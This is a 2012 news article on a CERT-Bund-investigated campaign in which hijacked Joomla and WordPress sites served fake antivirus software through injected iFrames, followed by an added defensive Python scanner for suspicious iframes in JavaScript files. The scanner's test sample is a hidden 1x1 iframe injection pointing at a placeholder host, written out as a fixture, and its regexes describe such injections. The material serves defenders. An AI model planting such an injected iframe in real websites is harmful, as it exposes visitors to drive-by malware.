A large number of websites have already been hijacked

Dec 12, 2012 12:31 GMT

A large number of Joomla websites, and some WordPress sites, have been compromised and set up to serve malware to visitors, mainly fake AVs (scareware).

Germany’s CERT-Bund researchers have investigated this cybercriminal campaign and, according to The H, they found that the attackers have injected iFrames into the hijacked sites to redirect users to an exploit kit via the Sutra Traffic Distribution System.

The initial infections were most likely achieved with the use of automated scripts that exploited known vulnerabilities in the Joomla Content Editor.

In this case, the crooks are making a profit via two channels. First, they earn some money from the users who pay the registration fees demanded by the fake antivirus applications.

They also make some money by using the traffic redistribution systems detailed around one year ago by experts from Symantec.

Webmasters are advised to make sure that their Joomla Content Editor is updated to the latest version. Those who believe that they might have fallen victim to this campaign are advised to check their JavaScript files for suspicious iFrames.
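
One way to carry out the check recommended above, as an added example that is not part of the original article: a Python scanner that flags lines in `.js` files that build an iframe, noting when the frame is hidden or tiny and when it loads from a host other than the site's own. The patterns, function names and sample host are assumptions made for this example, not indicators from the campaign.

```python
import re
import sys
from pathlib import Path

# Heuristics assumed for this example; they are not signatures from the campaign.
IFRAME = re.compile(r"""<iframe\b[^>]*>|createElement\(\s*['"]iframe['"]\s*\)""", re.I)
HIDDEN = re.compile(
    r"""(?:width|height)\s*[=:]\s*['"]?\s*[0-2](?:px)?\b"""
    r"""|display\s*:\s*none|visibility\s*:\s*hidden"""
    r"""|(?:left|top)\s*:\s*-\d{3,}""", re.I)
REMOTE_SRC = re.compile(r"""src\s*=\s*\\?['"]?\s*(?:https?:)?//([^/'"\s\\>]+)""", re.I)

# Constructed sample (placeholder host), not taken from a real site.
SAMPLE = """var nav = document.getElementById('nav');
document.write('<iframe src="http://redirector.example/go" width="1" height="1"></iframe>');
"""

def scan_text(text, own_hosts=()):
    """Return [(line_no, reasons)] for every line that builds an iframe."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if not IFRAME.search(line):
            continue
        reasons = ["iframe in script"]
        if HIDDEN.search(line):
            reasons.append("hidden or tiny")
        # Hosts the frame loads from, minus the ones the site legitimately uses.
        foreign = [h for h in map(str.lower, REMOTE_SRC.findall(line))
                   if h not in own_hosts]
        if foreign:
            reasons.append("remote src: " + ", ".join(foreign))
        findings.append((no, reasons))
    return findings

def scan_tree(root, own_hosts=()):
    """Scan every .js file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*.js"):
        found = scan_text(path.read_text(errors="replace"), own_hosts)
        if found:
            hits[str(path)] = found
    return hits

if __name__ == "__main__":
    # Usage: python scan.py WEBROOT [own-host ...]
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in sorted(scan_tree(root, tuple(sys.argv[2:])).items()):
        for no, reasons in found:
            print(f"{path}:{no}: {'; '.join(reasons)}")
```

Injections that assemble the tag at run time through obfuscation will not match these patterns, so comparing files against a clean copy of the same Joomla or extension release remains the stronger check.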